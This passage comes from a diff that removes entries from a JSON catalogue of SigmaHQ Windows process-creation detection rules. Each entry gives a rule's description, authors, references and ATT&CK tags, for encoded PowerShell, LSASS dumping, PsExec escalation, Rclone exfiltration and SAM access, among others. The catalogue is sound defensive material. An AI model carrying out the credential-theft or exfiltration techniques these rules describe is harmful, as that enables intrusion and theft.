"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ] - }, - "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", - "value": "Empire PowerShell UAC Bypass" - }, - { - "description": "Commandline to launch powershell with a base64 payload", - "meta": { - "author": "frack113", - "creation_date": "2022/01/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_encode.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", - "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", - "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", - "value": "Suspicious Execution of Powershell with Base64" - }, - { - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_encoded_param.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1281103918693482496", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", - "value": "PowerShell Encoded Character Syntax" - }, - { - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", - "creation_date": "2018/09/03", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "value": "Suspicious Encoded PowerShell Command Line" - }, - { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/04/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/PythonResponder/status/1385064506049630211", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ] - }, - "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "value": "PowerShell 
Get-Process LSASS" - }, - { - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "meta": { - "author": "John Lambert (rule)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", - "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" - }, - { - "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/24", - "falsepositive": [ - "Legitimate scripts that use IEX" - ], - "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" - ], - "tags": "No established tags" - }, - "uuid": "09576804-7a05-458e-a817-eb718ca91f54", - "value": "Suspicious PowerShell IEX Execution Patterns" - }, - { - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/16", - "falsepositive": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" - ], - "filename": "proc_creation_win_susp_powershell_parent_combo.yml", - "level": 
"medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "value": "Suspicious PowerShell Invocation Based on Parent Process" - }, - { - "description": "Detects a suspicious parents of powershell.exe", - "meta": { - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", - "creation_date": "2020/03/20", - "falsepositive": [ - "Other scripts" - ], - "filename": "proc_creation_win_susp_powershell_parent_process.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", - "value": "Suspicious PowerShell Parent Process" - }, - { - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/29", - "falsepositive": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" - ], - "filename": "proc_creation_win_susp_powershell_sam_access.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/splinter_code/status/1420546784250769408", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" - ], - "tags": [ - 
"attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "1af57a4b-460a-4738-9034-db68b880c665", - "value": "PowerShell SAM Copy" - }, - { - "description": "Detects suspicious sub processes spawned by PowerShell", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2022/04/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_sub_processes.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ankit_anubhav/status/1518835408502620162", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" - ], - "tags": "No established tags" - }, - "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "value": "Suspicious PowerShell Sub Processes" - }, - { - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "value": "Net WebClient Casing Anomalies" - }, - { - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" - ], - "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1463526834918854661", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "value": "NodejsTools PressAnyKey Lolbin" - }, - { - "description": "Attackers can use print.exe for remote file copy", - "meta": { - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "creation_date": "2020/10/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_print.yml", - "level": "medium", - "logsource.category": "process_creation", - 
"logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Print/", - "https://twitter.com/Oddvarmoe/status/985518877076541440", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", - "value": "Abusing Print Executable" - }, - { - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/10/30", - "falsepositive": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" - ], - "filename": "proc_creation_win_susp_procdump_lsass.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" - ] - }, - "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", - "value": "Suspicious Use of Procdump on LSASS" - }, - { - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/10/10", - "falsepositive": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "filename": "proc_creation_win_susp_process_hacker.yml", - "level": "high", - "logsource.category": "process_creation", - 
"logsource.product": "windows", - "refs": [ - "https://processhacker.sourceforge.io/", - "https://github.com/winsiderss/systeminformer", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" - ], - "tags": "No established tags" - }, - "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", - "value": "Process Hacker / System Informer Usage" - }, - { - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/11", - "falsepositive": [ - "Legitimate tools that accidentally match on the searched patterns" - ], - "filename": "proc_creation_win_susp_progname.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" - ], - "tags": "No established tags" - }, - "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "value": "Suspicious Program Names" - }, - { - "description": "Detects user accept agreement execution in psexec commandline", - "meta": { - "author": "omkar72", - "creation_date": "2020/10/30", - "falsepositive": [ - "Administrative scripts." 
- ], - "filename": "proc_creation_win_susp_psexec_eula.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "attack.t1021" - ] - }, - "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", - "value": "Psexec Accepteula Condition" - }, - { - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "meta": { - "author": "Romaissa Adjailia, FLorian Roth", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "filename": "proc_creation_win_susp_psexesvc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.youtube.com/watch?v=ro2QuZTIMBM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", - "value": "PsExec Service Execution" - }, - { - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. 
the administrator account)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "filename": "proc_creation_win_susp_psexesvc_as_system.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", - "value": "PsExec Service Execution as LOCAL SYSTEM" - }, - { - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "meta": { - "author": "FLorian Roth", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "filename": "proc_creation_win_susp_psexesvc_renamed.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.youtube.com/watch?v=ro2QuZTIMBM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "value": "Renamed PsExec Service Execution" - }, - { - "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2021/11/23", - "falsepositive": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)" - ], - "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", - "level": "high", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", - "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" - }, - { - "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2021/05/22", - "falsepositive": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" - ], - "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "207b0396-3689-42d9-8399-4222658efc99", - "value": "PsExec/PAExec Flags" - }, - { - "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", - "meta": { - "author": "Nasreddine Bencherchali @nas_bench", - "creation_date": "2021/12/18", - "falsepositive": [ - "Another 
tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" - ], - "filename": "proc_creation_win_susp_psloglist.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" - ] - }, - "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", - "value": "Suspicious Use of PsLogList" - }, - { - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2019/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Psr/", - "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", - "value": "Psr.exe Capture Screenshots" - }, - { - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "meta": { - "author": 
"Florian Roth, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/01/09", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "proc_creation_win_susp_ps_appdata.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/1082851155481288706", - "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", - "value": "PowerShell Script Run in AppData" - }, - { - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/08/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ps_downloadfile.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" - ] - }, - "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "value": "PowerShell DownloadFile" - }, - { - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", - "level": "high", - "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", - "value": "Suspicious PowerShell Obfuscated PowerShell Code" - }, - { - "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_radmin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", - "https://www.radmin.fr/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" - ] - }, - "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", - "value": "Use Radmin Viewer Utility" - }, - { - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", - "meta": { - "author": "@ROxPinTeddy", - "creation_date": "2020/05/12", - "falsepositive": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" - ], - "filename": "proc_creation_win_susp_rar_flags.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", - "https://ss64.com/bash/rar.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", - "value": "Rar Usage with Password and Compression Level" - }, - { - "description": "Detects suspicious process related to rasdial.exe", - "meta": { - "author": "juju4", - "creation_date": "2019/01/16", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_rasdial_activity.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/subTee/status/891298217907830785", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", - "value": "Suspicious RASdial Activity" - }, - { - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to 
escalate privileges to LOCAL SYSTEM",
- "meta": {
- "author": "Florian Roth, Maxime Thiebaut",
- "creation_date": "2021/08/23",
- "falsepositive": [
- "User selecting a different installation folder (check for other sub processes of this explorer.exe process)"
- ],
- "filename": "proc_creation_win_susp_razorinstaller_explorer.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/j0nh4t/status/1429049506021138437",
- "https://streamable.com/q2dsji",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1553"
- ]
- },
- "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167",
- "value": "Suspicious RazerInstaller Explorer Subprocess"
- },
- {
- "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc",
- "meta": {
- "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group",
- "creation_date": "2021/05/10",
- "falsepositive": [
- "Legitimate RClone use"
- ],
- "filename": "proc_creation_win_susp_rclone_execution.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
- "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone",
- "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1567.002"
- ]
- },
- "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638",
- "value": "Rclone Execution via Command Line or PowerShell"
- },
- {
- "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/07/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_recon.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1119"
- ]
- },
- "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7",
- "value": "Recon Information for Export with Command Prompt"
- },
- {
- "description": "Detects a set of suspicious network related commands often used in recon stages",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/02/07",
- "falsepositive": [
- "False positives depend on scripts and administrative tools used in the monitored environment"
- ],
- "filename": "proc_creation_win_susp_recon_network_activity.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1087",
- "attack.t1082",
- "car.2016-03-001"
- ]
- },
- "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e",
- "value": "Network Reconnaissance Activity"
- },
- {
- "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/05/27",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/1kwpeter/status/1397816101455765504",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1548"
- ]
- },
- "uuid": "883835a7-df45-43e4-bf1d-4268768afda4",
- "value": "Regedit as Trusted Installer"
- },
- {
- "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.",
- "meta": {
- "author": "Ivan Dyachkov, Yulia Fomina, oscd.community",
- "creation_date": "2020/10/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_register_cimprovider.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/PhilipTsukerman/status/992021361106268161",
- "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574"
- ]
- },
- "uuid": "a2910908-e86f-4687-aeba-76a5f996e652",
- "value": "DLL Execution Via Register-cimprovider.exe"
- },
- {
- "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.",
- "meta": {
- "author": "Austin Songer @austinsonger",
- "creation_date": "2021/11/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_registration_via_cscript.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
